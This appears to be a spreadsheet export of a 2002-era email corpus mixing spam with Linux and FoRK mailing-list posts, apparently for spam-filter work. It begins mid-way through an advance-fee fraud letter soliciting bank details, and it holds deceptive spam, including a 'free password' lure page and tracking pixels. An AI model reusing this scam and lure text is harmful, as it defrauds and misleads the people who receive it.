 as follows.
 1.Your private telephone and fax number for easy and
 strict communication
 2.Your bank particular for smooth and successful
 remittance of this monies to your nominated account
 3.You have to make necessary arrangement for me to
 meet with you immediately the monies is been
 transferred in your account and confirmed by you.
 4.You have to secure a college for me in your country
 to further my education. 
 5.You will have to be my guardian and part of the
 joint venture investment when I get to your country.
 Furthermore, my late father had instructed me to offer
 20 % of the total sum to the person who is to assist
 me out for the transferring of this fund.
 Moreover, I wish to assure you that this transaction
 would be concluded within the next(3)days you signify
 interest to assist me out.I suggest that this
 transaction should be handled in strict confidence
 because I have work out fine every modalities
 concerning the transfer of this fund. 
 Please and please, kindly hasten up the arrangement as
 quickly as possible because my late father instructed
 me not to invest this monies in this country Cte-
 dIvoire. That I should invest abroad of my choice for
 the benefit of myself and for security reasons.
 Thank very much in anticipation of your
 acknowledgement of this business proposal and do not
 hesitate to contact me immediately you receive this
 message with this my direct telephone number mentioned
 above, tel : + 225 05775748 for us to proceed
 immediately. Please and please, dont fail.
 waiting for your urgent response now
 thanks very much again and God bless.
 best regards
 MARTIN FRANCIS.
 ___________________________________________________________
 Do You Yahoo!? -- Une adresse @yahoo.fr gratuite et en franais !
 Yahoo! Mail : http://fr.mail.yahoo.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Want to play poker with other people online.
</t>
  </si>
  <si>
    <t xml:space="preserve">Get your favorite Poker action at http://www.multiplayerpoker.net
 Play against real people from around the world for real money or just
 for fun.  Access one of the busiest poker rooms online.  We've dealt
 over 8 million hands!  Experience the best poker software available
 today featuring world class graphics, true random shuffling algorithms,
 and 24x7 customer service.  We've got a great selection of poker games
 for you to play such as:
 Hold'em, Omaha
 Omaha Hi/Lo
 7 Card Stud
 7 Card Stud Hi/Lo
 5 Card Stud
 Poker tournaments
 Sign up today and start playing with new &amp; old friends...download our free
 software now at http://www.MultiPlayerPoker.net
 Current Promotion:
    $50 Deposit Bonus! - 100% bonus!
    Daily High Hand - $250 Daily.
    Progressive Bad Beat Jackpot - $2,000.00 minimum with $100.00 added
 daily.
    Tournaments - Multiplayer shootouts.
 wish not to received any further e-mail from us please click
 http://www.centralremovalservice.com/cgi-bin/poker-remove.cgi
 (C2-ss2)8654wjxY6-658XcLk9936BmrC8-408IWAe1238EocG7-405CvgV8282pIEa7-369wxhf6085uYwv5-l73
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The worst Freddy Krueger costume ever
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8412059,1717/
 Date: 2002-09-30T23:25:21+01:00
 [IMG: http://www.newsisfree.com/Images/fark/xent.gif ([X-Entertainment])]
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DBS Recommendations?
</t>
  </si>
  <si>
    <t xml:space="preserve">I told AT&amp;T to get lost after they wanted $$$ to change my service address.
 RCN doesn't service Mountain View, so I'm looking at Dish Network and 
 Direct TV.
 So far Direct TV appears to be the better deal.
 Recommendations? Horror stories? Alternatives I've missed?
 -- whump
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [ILUG] Marketing SIG has a good start :)
</t>
  </si>
  <si>
    <t xml:space="preserve">         |::::::::::::::::::::::::::::::::::::::::::::::::::|
                 IT's Monday 520      02 September 2002
               |::::::::::::::::::::::::::::::::::::::::|
 STUDENT LIFE BEGINS WITH LINUX
 by
 John Sterne
 The launch last month of a marketing special interest group by the
 Irish Linux Users Group (ILUG)  -  open source and marketing, it
 seems, might not be mutually exclusive concepts  -  has already
 sparked an interesting initiative at University College Cork.  When
 the new academic year begins at UCC, every incoming student will
 be offered a copy of Red Hat Linux 7.3.
 ILUG member Braun Brelin proposed this promotion, when he ran a
 training class for staff at the UCC computer science department.
 Brelin, who is the director of technology at OpenApp, says that the
 Linux offer could be extended to any or all of the other Irish
 universities.
 The user group is tapping into an international Red Hat programme
 that aims to introduce students at all levels to the open source
 style of computing.  The Linux distributor runs an 'educational
 channel' to reach this audience, bundling educational software
 with its operating environment and offering networked support
 services to eligible applicants.  This scheme was originally designed
 to suit the educational structures in the US, but is now available to
 schools and universities throughout the world.
 Red Hat Linux 7.3 incorporates ease of use and maintenance
 features and is intended to counter objections that Linux is hard to
 master on personal systems.
 The Linux-for-all project at UCC could also raise the profile of Red
 Hat Ireland.  Based in Cork, this operation has run shared financial
 services for other Red Hat offices in Europe since 2000.  Until now
 its involvement with users in Ireland has been fairly limited,
 although it does sometimes refer them to other Red Hat offices in
 Europe that offer consulting or technical support services.
 David Owens, Red Hat's director of global logistics and production,
 sees the formation of the ILUG marketing group as a reason to take
 a more proactive approach.  In the last three months, he notes, his
 office in Cork has received more and more calls from Irish
 companies that are interested in adopting Linux and has introduced
 some to Red Hat pre-sales consultants.
 -------------
 Many thanks are due to Braun and David for working together on this one.
 Regards
 L.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt; Perhaps more useful would be if Tim could check in the pickle(s?)
 &gt; generated by one of his training runs, so that others can see how
 &gt; Tim's training data performs against their own corpora.
 I did that yesterday, but seems like nobody bit.  Just in case &lt;wink&gt;, I
 uploaded a new version just now.  Since MINCOUNT went away, UNKNOWN_SPAMPROB
 is much less likely, and there's almost nothing that can be pruned away (so
 the file is about 5x larger now).
     http://sf.net/project/showfiles.php?group_id=61702
 &gt; This could also be the starting point for a self-contained distribution
 &gt; (you've got to start with *something*, and training with python-list data
 &gt; seems just as good as anything else).
 The only way to know anything here is for someone to try it.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Legal services for pennies a day! eolnt
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SA] =?big5?Q?Fw:=A7=DA=C4=B9=BF=FA=A4F?= 9iz5IOamknbO3ql9u1maoutC1cv
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_dO8zJ9VZJNgvpKVZoFA
 Content-Type: multipart/alternative;
 	boundary="----=_NextPart_dO8zJ9VZJNgvpKVZoFAAA"
 ------=_NextPart_dO8zJ9VZJNgvpKVZoFAAA
 Content-Type: text/html;
 	charset="big5"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQoNCjxoZWFkPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50
 PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9YmlnNSI+DQo8bWV0YSBuYW1lPSJHRU5FUkFUT1IiIGNvbnRl
 bnQ9Ik1pY3Jvc29mdCBGcm9udFBhZ2UgNC4wIj4NCjxtZXRhIG5hbWU9IlByb2dJZCIgY29udGVu
 dD0iRnJvbnRQYWdlLkVkaXRvci5Eb2N1bWVudCI+DQo8dGl0bGU+pWis3azdp2E8L3RpdGxlPg0K
 PC9oZWFkPg0KDQo8Ym9keT4NCg0KPERJVj48Rk9OVCBzaXplPTI+pWis3azdp2EhPC9GT05UPjwv
 RElWPg0KPERJVj48Rk9OVCBzaXplPTI+PEEgDQpocmVmPSJodHRwOi8vd3d3Ljk5OC50by8iPmh0
 dHA6Ly93d3cuOTk4LnRvLzwvQT48L0ZPTlQ+PC9ESVY+DQo8RElWPjxGT05UIHNpemU9Mj7ByKRG
 v/qnT6fRpEa90KvIs+EhPC9GT05UPjwvRElWPg0KPERJVj48Rk9OVCBzaXplPTI+Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7
 Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5i
 c3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7Jm5ic3A7IKOrvGUuLi4uLjwvRk9OVD48L0RJVj4NCg0KPC9i
 b2R5Pg0KDQo8L2h0bWw+
 ------=_NextPart_dO8zJ9VZJNgvpKVZoFAAA--
 ------=_NextPart_dO8zJ9VZJNgvpKVZoFA--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</si>
  <si>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&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Buyers Alert Announce&lt;/title&gt;
 &lt;/head&gt;
 &lt;body style="margin:8px 9px 9px 12px" bgcolor="#ffffff" background="http://techupdate.zdnet.com/techupdate/i/bg_232850.gif" link="#003399" alink="#cc0000" vlink="#666699"&gt;
 &lt;div align="center"&gt;
 &lt;a name="top"&gt;&lt;/a&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr valign="bottom"&gt;&lt;td width="440"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/hd_buyers_alert.gif" width="440" height="60" alt="ZDNet Announce"&gt;&lt;/td&gt;
 &lt;td width="184"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/corner_anc.gif" width="184" height="8"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#232850" cellpadding="0" cellspacing="0" border="0"&gt;
 &lt;tr bgcolor="#ffffef"&gt;&lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="600" height="32" align="center"&gt;&lt;font face="arial, helvetica" size="-1" color="#333333"&gt;&lt;b&gt;* * * * * * * * SPECIAL ADVERTISER ANNOUNCEMENT * * * * * * * *&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" rowspan="2" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" rowspan="2" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#cccccc"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width="624" bgcolor="#ffffff"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width="600"&gt;&lt;font face="verdana, geneva" size="-2" color="#333333"&gt;&amp;nbsp;&lt;sup&gt;&amp;nbsp;&lt;/sup&gt;
 &lt;!-- date --&gt;
 July 18, 2002
 &lt;!-- /date --&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- ### promo content ### --&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;HP Postcard&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#FFFFFF"&gt;
 &lt;center&gt;
 &lt;table border="0" cellpadding="10" cellspacing="0"&gt;
     &lt;tr&gt;
         &lt;td&gt;
 &lt;table width="551" border="0" cellpadding="0" cellspacing="0"&gt;
     &lt;tr&gt;
         &lt;td rowspan="7"&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_01.gif" width="347" height="294"&gt;&lt;/td&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXAWUZUs798BbBL7kOi_yR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_02.gif" width="204" height="50" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_03.gif" width="204" height="67"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_04.gif" width="204" height="49"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=1a-y6ZkIlXHbt-tY-Hd5q0_HZB17WnR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_05.gif" width="204" height="17" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=2f-hYaFIqnzFVqljWBP26D_8gaZjMeR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_06.gif" width="204" height="17" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;a href="http://clickthru.online.com/Click?q=44-9nxfIZUtiC3hhv-EMLKlXBDgnVsR"&gt;
                 &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_07.gif" width="204" height="20" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_08.gif" width="204" height="74"&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
         &lt;td colspan="2"&gt;
             &lt;img src="http://hpshopping.speedera.net/www.shopping.hp.com/shopping/images/icons/hp_postcard_09.gif" width="551" height="16"&gt;&lt;/td&gt;
     &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;
     &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;!-- ### /promo content ### --&gt;
 &lt;/td&gt;
 &lt;td width="1" bgcolor="#000000"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;
 &lt;td width="10" bgcolor="#1E5C99"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="10" height="1"&gt;&lt;/td&gt;
 &lt;td width="1" bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="1" height="1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer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width="624"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href='http://clickthru.online.com/Click?q=59-y5OozjnNuCiDwN-4UQzUlGf6dM7xysRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@example.com&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://www.zdnet.com/filters/email/faq/"&gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://www.cnet.com/aboutcnet/0-13618.html?tag=ft"&gt;Advertise&lt;/a&gt;&lt;br&gt;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width=624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width=624 cellpadding=0 cellspacing=0 border=0&gt;&lt;tr bgcolor="#1E5C99"&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10&gt;&lt;img src="http://www.zdnet.com/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=75&gt;&lt;a href="http://www.zdnet.com/"&gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://www.zdnet.com/techupdate/filters/main/" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020441,00.html" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020424,00.html" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020442,00.html" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020443,00.html" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020445,00.html" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020444,00.html" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://www.zdnet.com/techupdate/filters/mrc/0,14175,6020568,00.html" style="color: #fff"&gt;Careers&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;/tr&gt;&lt;/table&gt;
 &lt;table width=624 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#83A3CB"&gt;&lt;img src="http://www.zdnet.com/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;tr:ad name="copyright" /&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=6e-2a7jniEv1DuKmbZi3ODXepsIWdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Remeber me?
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1"&gt;
 &lt;base href="http://200.43.112.5/"&gt;
 &lt;/HEAD&gt;
 &lt;BODY BGCOLOR=#FFFFFF LEFTMARGIN=0 TOPMARGIN=0 MARGINWIDTH=0 MARGINHEIGHT=0&gt;
 &lt;center&gt;
 &lt;TABLE WIDTH=550 BORDER=0 CELLPADDING=0 CELLSPACING=0 align="center"&gt;
 	&lt;TR&gt;
 		&lt;TD COLSPAN=3&gt;&lt;a href="/mhg/?aid=735143&amp;cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;
 			&lt;IMG SRC="/ads/images/mhg_01.jpg" WIDTH=550 HEIGHT=93 ALT="" border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD ROWSPAN=2&gt;&lt;a href="/mhg/?aid=735143&amp;cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;
 			&lt;IMG SRC="/ads/images/mhg_02.jpg" WIDTH=28 HEIGHT=307 ALT="" border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
     &lt;TD WIDTH=324 HEIGHT=289 valign="top"&gt; 
       &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;&lt;b&gt;THIS 
         IS A SPECIAL FREE OFFER THAT YOU WILL ONLY GET ONCE!&lt;/b&gt;&lt;/font&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;My name 
         is Paige and I have made a new site for my friends. This is not just a 
         normal site but it is &lt;font color="#FF0000"&gt;&lt;b&gt;FREE&lt;/b&gt;&lt;/font&gt; to you. 
         I am only making this offer once so hurry and claim your &lt;b&gt;&lt;font color="#FF0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; 
         password now!&lt;/font&gt;&lt;/p&gt;
       &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;Make 
         sure that you have at least a valid email to retrieve your password and 
         that is all that you need. &lt;/font&gt;&lt;/p&gt;
       &lt;p align="center"&gt;&lt;font face="Arial, Helvetica, sans-serif" size="3"&gt;
       &lt;a href="/mhg/?aid=735143&amp;cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;&lt;b&gt;CLICK 
         HERE TO &lt;br&gt;
         RETRIEVE YOUR PASSWORD NOW!&lt;br&gt;
         &lt;br&gt;
         &lt;br&gt;
         MY SITE IS 100% &lt;font color="#FF0000"&gt;FREE&lt;/font&gt; FOR LIFE&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/p&gt;
     &lt;/TD&gt;
 		&lt;TD ROWSPAN=2&gt;&lt;a href="/mhg/?aid=735143&amp;cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;
 			&lt;IMG SRC="/ads/images/mhg_04.jpg" WIDTH=198 HEIGHT=307 ALT="" border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 	&lt;TR&gt;
 		&lt;TD&gt;&lt;a href="/mhg/?aid=735143&amp;cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;
 			&lt;IMG SRC="/ads/images/mhg_05.jpg" WIDTH=324 HEIGHT=18 ALT="" border="0"&gt;&lt;/a&gt;&lt;/TD&gt;
 	&lt;/TR&gt;
 &lt;/TABLE&gt;
 &lt;/center&gt;
 &lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;This 
 email was sent to you because your email address is part of a targeted opt-in 
 list.You have received this &lt;br&gt; email by either requesting more information on 
 one of our sites or someone may have used your email address.&lt;br&gt; If you received 
 this email in error, please accept our apologies.&lt;br&gt; If you do not wish to receive 
 further offers, please click below and enter your email to remove your email from 
 future offers. &lt;/font&gt;&lt;/p&gt;&lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;&lt;a href="/?cid=85&amp;eid=am1AbmV0bm90ZWluYy5jb20="&gt;Click 
 Here to Remove&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;&lt;p align="left"&gt;&lt;font face="Arial, Helvetica, sans-serif"&gt;Anti-SPAM 
 Policy Disclaimer: Under Bill s.1618 Title III passed by the 105th U. S. Congress, 
 mail cannot be considered spam &lt;br&gt; as long as we include contact information 
 and a remove link for removal from this mailing list. If this e-mail is unsolicited, 
 please &lt;br&gt; accept our apologies. Per the proposed H.R. 3113 Unsolicited Commercial 
 Electronic Mail Act of 2000, further transmissions &lt;br&gt; to you by the sender may 
 be stopped at NO COST to you!&lt;/font&gt;&lt;br&gt; &lt;/p&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] eircom mail
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt;
 &gt;hi i was just wondering if anyone experiening difficulty with eircom
 mail
 &gt;sever.I was trying to send mail from mozilla mail but it keeps coming
 up
 &gt;with this error:
 &gt;sorry,that domain isnt in my list of allows rcpthosts(#5.7.1)
 &gt;please check the message recipients and try again.
 &gt;
 &gt;What is this all about.
 &gt;I am using mail2.eircom.net as my smtp and my pop, i can recieve mail
 but
 &gt;i cannot send mail. is there any other open relay that i  can use.
 I think you'll find it's at Eircons end. I occasionally have problems
 sending to a server I use, whose admin said it's a known bug for which
 he had to apply a patch... you'll probably want to tell eircon's admins
 that they need to patch the server, and to re-do it if they think it's
 already done...
 sorry for the lame answer, but it's been so long I've forgotten the
 details.
 Have Fun,
 Jim.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fw: Got Ink?            UJOLK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</si>
  <si>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&lt;title&gt;Do you Have an Inkjet or Laser Printer?&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;div align=3D"left"&gt;
   &lt;table border=3D"2" width=3D"420" height=3D"55" bordercolor=3D"#FFFFFF" =
 bordercolorlight=3D"#FFFF00" bordercolordark=3D"#000080" bgcolor=3D"#00000=
 0"&gt;
     &lt;tr&gt;
       &lt;td width=3D"100%" height=3D"49" align=3D"center" bgcolor=3D"#000000=
 " bordercolor=3D"#C0C0C0" style=3D"border-right-style: solid; border-right=
 -color: #C0C0C0"&gt;&amp;nbsp;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"5" align=3D"center" bgcolor=3D"=
 #FFFF00" style=3D"color: #FFFFFF; font-size: 10pt; font-weight: bold"&gt;&lt;b&gt;&lt;=
 font face=3D"Verdana" size=3D"3" color=3D"#000000"&gt;Do
         you Have an Inkjet or Laser Printer?&lt;/font&gt;&lt;/b&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;Yes? The=
 n we can &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;SAVE&lt;/=
 font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         you &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt;$$$=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt; Money!&lt;/font&gt;&lt;=
 /b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font size=3D"3" color=3D"#FFFFFF"&gt;&lt;font face=3D"Verdana"&gt;Ou=
 r High Quality Ink &amp; Toner Cartridges come
         with a money-back guarantee,&lt;/font&gt; &lt;font face=3D"Verdana"&gt;a 1-yea=
 r
         Warranty*, and get &lt;/font&gt;&lt;/font&gt;&lt;i&gt;&lt;font face=3D"Verdana" size=3D=
 "3" color=3D"#FFFF99"&gt;&lt;u&gt;FREE 3-Day SHIPPING
         &lt;/u&gt;!*&lt;/font&gt;&lt;/i&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;and best=
  of all...They Cost
         &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFF99"&gt; up to =
 80% &lt;/font&gt; &lt;i&gt;&lt;u&gt;&lt;font face=3D"Verdana" color=3D"#FFFF99" size=3D"4"&gt;Less=
 &lt;/font&gt;&lt;/u&gt;&lt;/i&gt;
         &lt;font face=3D"Verdana" size=3D"3" color=3D"#FFFFFF"&gt;
         than
         Retail Price!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
         &lt;div align=3D"center"&gt;
           &lt;center&gt;
           &lt;table border=3D"1" width=3D"99%" height=3D"11" bordercolor=3D"#=
 000000"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" bgcolor=3D"#FFFF00" align=3D"center" styl=
 e=3D"color: #FFFFFF" bordercolor=3D"#000000"&gt;
         &lt;p&gt;&lt;b&gt;&lt;font face=3D"Verdana" size=3D"3" color=3D"#00CC99"&gt;&lt;a style=
 =3D"color: #000000; font-weight: bold" href=3D"http://www.superink.net/"&gt;*=
 Click here
         to visit Our Website!*&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;/td&gt;
             &lt;/tr&gt;
           &lt;/table&gt;
           &lt;/center&gt;
         &lt;/div&gt;
         &lt;p&gt;&lt;b&gt;&lt;u&gt;&lt;font size=3D"4" color=3D"#FFFFFF"&gt;or Call us Toll-Free @
         1-800-758-8084!&lt;/font&gt;&lt;/u&gt;&lt;/b&gt;
         &lt;p&gt;&lt;font size=3D"1" face=3D"Arial" color=3D"#C0C0C0"&gt;*90-day warra=
 nty on remanufactured
         cartridges. Free shipping on orders over $40&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
   &lt;/table&gt;
 &lt;/div&gt;
 &lt;br&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;div align=3D"left"&gt;
           &lt;table border=3D"0" width=3D"420" height=3D"42" bgcolor=3D"#0000=
 00"&gt;
             &lt;tr&gt;
               &lt;td width=3D"100%" height=3D"36" align=3D"center" style=3D"f=
 ont-family: Palatino Linotype; font-size: 8pt; color: #FFFFFF"&gt;&lt;font face=3D=
 "Verdana" size=3D"1" color=3D"#FFFFFF"&gt;You
                 are receiving this special offer because you have provided=
 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#000000"&gt;
                 &lt;/font&gt;&lt;font face=3D"Verdana" size=3D"1" color=3D"#FFFFFF"=
 &gt;
                 permission to receive email communications regarding speci=
 al
                 online promotions or offers. If you feel you have received=
  this
                 message in error, or wish to be removed from our subscribe=
 r
                 list, &lt;a href=3D"mailto:print1@btamail.net.cn" style=3D"co=
